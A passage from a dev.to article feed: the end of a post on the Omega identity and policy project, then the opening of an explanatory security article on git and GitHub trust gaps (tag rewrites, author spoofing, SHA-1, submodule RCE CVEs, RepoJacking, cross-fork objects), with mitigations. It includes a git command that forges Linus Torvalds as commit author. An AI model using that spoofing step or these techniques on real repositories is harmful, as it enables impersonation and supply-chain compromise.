&lt;p&gt;Drop a Cedar policy in &lt;code&gt;policies/&lt;/code&gt; and pass &lt;code&gt;--policy-dir policies&lt;/code&gt; to&lt;br&gt;
the server:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;permit (
  principal == Spiffe::"spiffe://omega.local/example/web",
  action    == Action::"GET",
  resource  == HttpPath::"/api/foo"
);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Re-run the curl and the response flips to&lt;br&gt;
&lt;code&gt;{"decision":true,"reasons":["policy0"]}&lt;/code&gt;. Tear it down with &lt;code&gt;make&lt;br&gt;
docker-down&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;
  
  
  How the audit log stays tamper-evident
&lt;/h2&gt;

&lt;p&gt;Every write goes through one append path that computes a row hash from&lt;br&gt;
the previous row's hash plus this row's content&lt;br&gt;
(&lt;code&gt;internal/server/storage/audit.go&lt;/code&gt;):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// hash = sha256(seq | ts_nano | kind | actor | subject | decision | payload | prev_hash)&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;sha256&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;New&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="n"&gt;fmt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%d|%d|%s|%s|%s|%s|"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Ts&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;UnixNano&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
    &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Kind&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Actor&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Subject&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Decision&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;([]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Payload&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;([]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"|"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;([]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ev&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PrevHash&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;AppendAudit&lt;/code&gt; is serialized through a single mutex so the&lt;br&gt;
&lt;code&gt;prev_hash&lt;/code&gt; lookup and the INSERT cannot interleave. A &lt;code&gt;Verify&lt;/code&gt; walk&lt;br&gt;
re-computes every row and reports the first mismatched &lt;code&gt;seq&lt;/code&gt;, so any&lt;br&gt;
deletion or in-place edit shows up the next time you scan.&lt;/p&gt;
&lt;h2&gt;
  
  
  AI agent delegation example
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;examples/mcp-a2a-delegation/&lt;/code&gt; directory shows how a human, a&lt;br&gt;
coordinator agent, and a sub-agent chain through Omega. Each hop calls&lt;br&gt;
&lt;code&gt;POST /v1/token/exchange&lt;/code&gt;, which mints a new JWT-SVID whose &lt;code&gt;act&lt;/code&gt; claim&lt;br&gt;
is the previous token's subject. After two hops the leaf token looks&lt;br&gt;
like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"spiffe://omega.local/agents/claude-code/github-tool"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"act"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"spiffe://omega.local/agents/claude-code"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"act"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"spiffe://omega.local/humans/alice"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The tool-server verifies the leaf with the omega JWKS, checks the&lt;br&gt;
audience, and walks the &lt;code&gt;act&lt;/code&gt; chain. With&lt;br&gt;
&lt;code&gt;--enforce-token-exchange-policy&lt;/code&gt; the Cedar policy gets the final say&lt;br&gt;
on whether each exchange is allowed, and every decision lands in the&lt;br&gt;
audit log.&lt;/p&gt;

&lt;p&gt;This is a reference example today, not an in-tree library.&lt;/p&gt;

&lt;h2&gt;
  
  
  What comes next
&lt;/h2&gt;

&lt;p&gt;Three things have to land before the project moves off &lt;code&gt;v0.0.x&lt;/code&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;OmegaIdentity&lt;/code&gt; CRD plus operator-to-control-plane mTLS.&lt;/li&gt;
&lt;li&gt;SPIFFE federation bundle authenticity (peer mTLS plus first-time pin) and JWKS federation.&lt;/li&gt;
&lt;li&gt;An OIDC IdP federation adapter, AWS first.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;PQC (ML-DSA / ML-KEM) and a CSI driver are deliberately later. CRL and&lt;br&gt;
OCSP are not on the list at all; short-lived SVIDs plus rotation is&lt;br&gt;
the revocation story. Detailed non-goals (secrets storage, end-user&lt;br&gt;
login UI, service-mesh data plane, SIEM, agent runtime) live in&lt;br&gt;
&lt;a href="https://github.com/0-draft/omega/blob/main/docs/non-goals.md" rel="noopener noreferrer"&gt;&lt;code&gt;docs/non-goals.md&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try it
&lt;/h2&gt;

&lt;p&gt;If you have spent an evening stitching SPIRE to OPA to Keycloak to&lt;br&gt;
Loki, please clone it, run &lt;code&gt;make docker-up&lt;/code&gt;, and tell me where it&lt;br&gt;
breaks.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Repo: &lt;a href="https://github.com/0-draft/omega" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Issues: &lt;a href="https://github.com/0-draft/omega/issues" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega/issues&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Discussions: &lt;a href="https://github.com/0-draft/omega/discussions" rel="noopener noreferrer"&gt;https://github.com/0-draft/omega/discussions&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>spiffe</category>
      <category>authzen</category>
      <category>security</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Hacking GitHub: From Tag Rewrites to Dangling Commits, Where the Git Protocol Trusts You Without Checking</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Thu, 30 Apr 2026 15:02:43 +0000</pubDate>
      <link>https://dev.to/kanywst/hacking-github-from-tag-rewrites-to-dangling-commits-where-the-git-protocol-trusts-you-without-2o4h</link>
      <guid>https://dev.to/kanywst/hacking-github-from-tag-rewrites-to-dangling-commits-where-the-git-protocol-trusts-you-without-2o4h</guid>
      <description>&lt;h2&gt;
  
  
  Intro: Why we got burned twice by the same trick
&lt;/h2&gt;

&lt;p&gt;On 2025-03-14, the GitHub Action &lt;code&gt;tj-actions/changed-files&lt;/code&gt; was hijacked. 23,000 repositories were affected. Base64-encoded AWS / GitHub / PyPI tokens were dumped into public CI logs. CVE-2025-30066.&lt;/p&gt;

&lt;p&gt;About a year later, on 2026-03-19, &lt;code&gt;aquasecurity/trivy-action&lt;/code&gt; was hit by almost the same playbook. Of 76 version tags, 75 were rewritten to point at attacker-controlled commits.&lt;/p&gt;

&lt;p&gt;Every news headline says "supply chain attack". But if you put the two incidents side by side, the spot that got attacked is the same exact thing: &lt;strong&gt;the &lt;code&gt;v44&lt;/code&gt; portion of &lt;code&gt;uses: org/action@v44&lt;/code&gt;&lt;/strong&gt;, i.e. the commit a git tag is currently pointing to.&lt;/p&gt;

&lt;p&gt;Did you ever quietly assume that a git tag is an immutable fingerprint? It is not. It is a label. You can force-push it. You can rewrite it. The fact that GitHub's UI says "v44" gives you no guarantee that this v44 points to the same commit it pointed to last week.&lt;/p&gt;

&lt;p&gt;This gap is the attack surface. And it is not just a tag issue. It comes from the fact that &lt;strong&gt;the git protocol is designed on the assumption that there is trust between humans and repositories&lt;/strong&gt;. Authors can self-identify. Submodule paths are trusted. Deleted repos are not actually deleted.&lt;/p&gt;

&lt;p&gt;In this article I dissect that trust gap across three layers.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Layer 1: the git protocol itself&lt;/strong&gt; (tag, author, SHA-1, submodule)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 2: the GitHub platform&lt;/strong&gt; (RepoJacking, CFOR, dangling commits)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layer 3: GitHub Actions&lt;/strong&gt; (pwn request, script injection, cache poisoning, self-hosted runner)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;At the end I provide hands-on demos you can run locally, plus a defense matrix that maps each attack to its mitigations.&lt;/p&gt;




&lt;h2&gt;
  
  
  Prerequisites: terminology
&lt;/h2&gt;

&lt;p&gt;Before diving in, here are the concepts that come back over and over.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Git object&lt;/strong&gt;: git stores every file / tree / commit as an object keyed by SHA-1 hash under &lt;code&gt;.git/objects/&lt;/code&gt;. The whole system runs on the assumption that "if the hash matches, the content matches".&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tag&lt;/strong&gt;: a "label" pointing to a specific commit object SHA. &lt;code&gt;refs/tags/v1.0&lt;/code&gt; is just a file containing a SHA, and it can be rewritten later (&lt;code&gt;git push --force --tags&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Annotated tag vs lightweight tag&lt;/strong&gt;: the former has its own object and can be signed; the latter is just a ref. Most &lt;code&gt;@v1&lt;/code&gt;-style references in GitHub Actions are lightweight tags.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Commit author / committer&lt;/strong&gt;: metadata inside the commit object. You set it freely with &lt;code&gt;user.name&lt;/code&gt; and &lt;code&gt;user.email&lt;/code&gt;. Git itself does not verify it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Verified badge&lt;/strong&gt;: shown by the GitHub UI when "the commit has a GPG / SSH / S/MIME signature, and the key is registered to the author's GitHub account". &lt;strong&gt;Unsigned commits show nothing&lt;/strong&gt; unless vigilant mode is on.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt;&lt;/strong&gt;: a workflow trigger in GitHub Actions. Unlike &lt;code&gt;pull_request&lt;/code&gt;, &lt;strong&gt;it runs in the target repo's context and has access to secrets&lt;/strong&gt;. The intent is "let trusted automation (linters / labelers) run on outside-contributor PRs", but it causes huge incidents when misused.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CFOR (Cross Fork Object Reference)&lt;/strong&gt;: forks share an object store with their parent, so a commit pushed to a fork is reachable from the parent repo's URL. GitHub has classified this as "by design".&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That is enough to read the rest.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 1: the git protocol itself is trust-based
&lt;/h2&gt;

&lt;p&gt;Git is a distributed VCS designed around "we don't agree on things we can't agree on". Conversely, an object you create locally is treated as fact. There is no protocol-level mechanism for a central server to validate content. We will look at this gap from four angles: &lt;strong&gt;what a tag points to (1.1)&lt;/strong&gt;, &lt;strong&gt;the author's identity (1.2)&lt;/strong&gt;, &lt;strong&gt;SHA-1 identity (1.3)&lt;/strong&gt;, and &lt;strong&gt;arbitrary file writes via submodules (1.4)&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 A git tag is just a label (tag rewrite)
&lt;/h3&gt;

&lt;p&gt;Back to tj-actions and Trivy. The moment you write &lt;code&gt;uses: tj-actions/changed-files@v44&lt;/code&gt;, every workflow run fetches "the commit that v44 currently points to". The commit a tag points to is not fixed in advance: &lt;strong&gt;it is whatever value is on the server at run time&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxmldb8vzfydoho8tvmji.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxmldb8vzfydoho8tvmji.png" alt="Git Tag" width="800" height="611"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Git does not forbid moving a tag. &lt;code&gt;git push --force --tags&lt;/code&gt; is enough. GitHub does not enable tag protection by default either.&lt;/p&gt;

&lt;p&gt;The fix is straightforward: &lt;strong&gt;pin to a commit SHA instead of a tag&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tj-actions/changed-files@a284dc1aef0bee70773b0f93ddaeb1e3ea9aa6ff&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A 40-char SHA is immutable as long as you can't collide SHA-1. But pinning alone is not enough: if the SHA you pinned was malicious from the start, you are still owned. So pinning needs to be combined with signature verification via &lt;strong&gt;Sigstore&lt;/strong&gt; or &lt;strong&gt;SLSA Provenance&lt;/strong&gt;. Sigstore is a signing infrastructure for OSS that issues short-lived certificates from an OIDC identity and writes the signature to a public log (Rekor) as one operation. SLSA Provenance attaches a signed JSON document to a build artifact recording "which source / builder / inputs produced it"; at level 3 and above it also requires tamper-resistant builders. Sigstore's git-signing CLI &lt;strong&gt;gitsign&lt;/strong&gt; lets you sign commits and tags with the same machinery.&lt;/p&gt;

&lt;p&gt;GitHub added a feature called &lt;strong&gt;Immutable Releases&lt;/strong&gt; in 2025 (Public Preview 2025-08-26, GA 2025-10-28). When enabled, the moment you cut a release the tag is locked to a specific commit, and you cannot move the tag, swap release assets, or delete the release. Each release also gets a signed &lt;strong&gt;release attestation&lt;/strong&gt; so consumers can verify authenticity. Incidents like tj-actions and Trivy cannot happen by design if the Action maintainer enables this. The catch: &lt;strong&gt;enablement is on the maintainer side&lt;/strong&gt;; consumers cannot force it.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.2 Commit author is self-declared
&lt;/h3&gt;

&lt;p&gt;Now consider the trust around commit author. Look at this sequence.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git &lt;span class="nt"&gt;-c&lt;/span&gt; user.name&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'Linus Torvalds'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;-c&lt;/span&gt; user.email&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'torvalds@linux-foundation.org'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    commit &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"fix: typo"&lt;/span&gt;
git push origin main
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That is enough for the GitHub UI to show the commit &lt;strong&gt;with Linus Torvalds's avatar and a link to his profile&lt;/strong&gt;. GitHub just looks at the email field on the commit object and pulls the profile of "the account that has registered this email".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvbljoqbzehebr1oae7t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvbljoqbzehebr1oae7t.png" alt="Commit author is self-declared" width="800" height="411"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is not a GitHub bug; it is the spec. The git protocol itself does not verify authors.&lt;/p&gt;

&lt;p&gt;The only real defense is &lt;strong&gt;commit signing + the Verified badge&lt;/strong&gt;. Sign with &lt;code&gt;git commit -S&lt;/code&gt; using GPG / SSH, register the key on your GitHub account, and the commit gets a "Verified" badge. Unsigned commits show nothing.&lt;/p&gt;

&lt;p&gt;The attacker's next move from here is to &lt;strong&gt;rely on readers ignoring the absence of a Verified badge&lt;/strong&gt;. Most developers do not check for the green check on every commit. Per a GitHub study (2025), repositories that adopt commit signing are still a minority, and a large fraction of commits land "unsigned = unverified".&lt;/p&gt;

&lt;p&gt;GitHub has a feature called &lt;strong&gt;vigilant mode&lt;/strong&gt; that forces an "Unverified" badge on unsigned commits. Even sneakier is the &lt;strong&gt;co-authored-by trailer&lt;/strong&gt;: write &lt;code&gt;Co-authored-by: Some Person &amp;lt;email&amp;gt;&lt;/code&gt; in the commit message and, if the main author is signed, GitHub shows "Partially Verified" while still attributing the co-author name to anyone you want.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.3 SHA-1 collision (SHAttered)
&lt;/h3&gt;

&lt;p&gt;Git's notion of object identity is SHA-1. SHA-1 was practically broken in 2017 by the SHAttered research from Google and CWI Amsterdam. Generating two different PDFs with the same SHA-1 cost about \$110,000 of compute at the time.&lt;/p&gt;

&lt;p&gt;Can you collide a git commit with this? Not really, in practice. The reason: git prefixes a header like &lt;code&gt;blob &amp;lt;size&amp;gt;\0&lt;/code&gt; before hashing an object, so the header-prefixed blob and the raw PDF are different bytestreams. Running &lt;code&gt;git add&lt;/code&gt; on the SHAttered PDFs does not produce a collision. You would need to redo the same collision attack against git's object format, and that cost is still in the "computationally hard" zone.&lt;/p&gt;

&lt;p&gt;GitHub.com introduced &lt;strong&gt;SHA-1 collision detection&lt;/strong&gt; in 2017, and objects with the SHAttered attack signature are rejected at push time. Git itself adopted the same detection logic. Marc Stevens published a library called &lt;a href="https://github.com/cr-marcstevens/sha1collisiondetection" rel="noopener noreferrer"&gt;&lt;code&gt;sha1collisiondetection&lt;/code&gt;&lt;/a&gt; (commonly "sha1dc"), git imports it as a submodule, and replaces its built-in SHA-1 implementation with it. At nearly the cost of a normal SHA-1 computation, it returns a different hash or aborts when it detects collision-attack patterns.&lt;/p&gt;

&lt;p&gt;Separately, git is moving toward &lt;strong&gt;SHA-256&lt;/strong&gt;. You can create a SHA-256 repo with &lt;code&gt;git init --object-format=sha256&lt;/code&gt;. But most hosting providers, including GitHub.com, do not accept SHA-256 repos for push, so practical adoption is far off.&lt;/p&gt;

&lt;p&gt;The point worth taking away: &lt;strong&gt;a SHA-1 collision is not an immediate threat&lt;/strong&gt;, but unlike the other attacks above (tag rewrite, author spoofing) it is &lt;strong&gt;the mathematical foundation of "pin by commit SHA"&lt;/strong&gt; as a defense. If SHA-1 is fully broken, the SHA-pinning strategy below is also defeated. The SHA-256 migration is long-term insurance.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.4 RCE via submodule (CVE-2024-32002, CVE-2025-48384)
&lt;/h3&gt;

&lt;p&gt;In 2024 and 2025, two CVEs in a row let &lt;code&gt;git clone&lt;/code&gt; itself produce RCE. Both go through submodules.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CVE-2024-32002&lt;/strong&gt; abuses case-insensitive filesystems (macOS / Windows). The malicious repo contains both a submodule path and a symlink to that path. A case-insensitive filesystem cannot distinguish them, so during checkout, files that should be written into the worktree are written through the symlink into &lt;code&gt;.git/hooks/post-checkout&lt;/code&gt;. The next git command triggers the hook and runs arbitrary code. Setting &lt;code&gt;git config --global core.symlinks false&lt;/code&gt; avoids it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CVE-2025-48384&lt;/strong&gt; is more clever: it injects &lt;code&gt;\r&lt;/code&gt; (CR) into the path field in &lt;code&gt;.gitmodules&lt;/code&gt;. Git &lt;strong&gt;strips CRLF on read but does not quote on write&lt;/strong&gt;, so CR creates an asymmetry between read and write. Combined with a symlink, this turns into arbitrary file write and a hook is dropped. Reproducible on Linux / macOS.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc60qeb4nzxqte1mdo34i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc60qeb4nzxqte1mdo34i.png" alt="RCE" width="800" height="520"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The mitigation is to use a &lt;strong&gt;patched git&lt;/strong&gt; (v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, v2.50.1 or later). Also avoid &lt;code&gt;--recursive&lt;/code&gt; clones of repos you don't trust. When CI builds external PRs, clone with &lt;code&gt;--no-recursive&lt;/code&gt; first and review the submodule contents manually.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 2: GitHub-platform persistence bugs
&lt;/h2&gt;

&lt;p&gt;From here we leave bare git and look at the convenience features GitHub the hosting service added on top, which backfire. Username / repo rename leads to &lt;strong&gt;RepoJacking&lt;/strong&gt;, fork object-store sharing leads to &lt;strong&gt;CFOR&lt;/strong&gt;, and force-push history overwrites lead to &lt;strong&gt;secret extraction from dangling commits&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 RepoJacking
&lt;/h3&gt;

&lt;p&gt;On GitHub you can rename or delete an org / user. But &lt;strong&gt;all the code that depended on that URL stays put&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;For example, suppose &lt;code&gt;myorg/foo&lt;/code&gt; has many &lt;code&gt;go get github.com/myorg/foo&lt;/code&gt; consumers, and &lt;code&gt;myorg&lt;/code&gt; is deleted. If an attacker registers &lt;code&gt;myorg&lt;/code&gt; and creates a &lt;code&gt;foo&lt;/code&gt; repo, &lt;strong&gt;fetches against the old URL now resolve to the attacker's repo&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42m49k4aztoetigy661x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42m49k4aztoetigy661x.png" alt="Repo Jacking" width="800" height="513"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;GitHub protects names of popular repos with &lt;strong&gt;namespace retirement&lt;/strong&gt;: once a repo passes a star threshold, the name is held back for some time after retirement. But the &lt;strong&gt;race-condition bypass&lt;/strong&gt; Checkmarx published in 2024 used the timing gap between repo creation and username rename to skip retirement. That re-exposed over 4,000 packages.&lt;/p&gt;

&lt;p&gt;Defense is to &lt;strong&gt;pin dependencies to a commit SHA&lt;/strong&gt;, plus run a &lt;strong&gt;dependency proxy / vendor&lt;/strong&gt; so dependency code is mirrored in your own copy. Go modules' &lt;code&gt;GOPROXY=https://proxy.golang.org&lt;/code&gt; is close in spirit.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Cross-Fork Object Reference (CFOR)
&lt;/h3&gt;

&lt;p&gt;This one surprises people who learn it for the first time. Consider this scenario.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;I own &lt;code&gt;myorg/private-repo&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Collaborator A forks it as &lt;code&gt;A/private-repo-fork&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;A accidentally pushes &lt;code&gt;~/.aws/credentials&lt;/code&gt; to the fork.&lt;/li&gt;
&lt;li&gt;A panics and deletes the fork.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The commit A pushed is still visible from my &lt;code&gt;myorg/private-repo&lt;/code&gt; URL&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fte4aeoy14ox916eafip4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fte4aeoy14ox916eafip4.png" alt="Cross Fork" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The reason is a GitHub optimization: forks share an object pool with their parent. When A deletes their fork, the commit object is still in the parent, so &lt;strong&gt;&lt;code&gt;github.com/myorg/private-repo/commit/&amp;lt;SHA&amp;gt;&lt;/code&gt; returns it&lt;/strong&gt;.&lt;/p&gt;

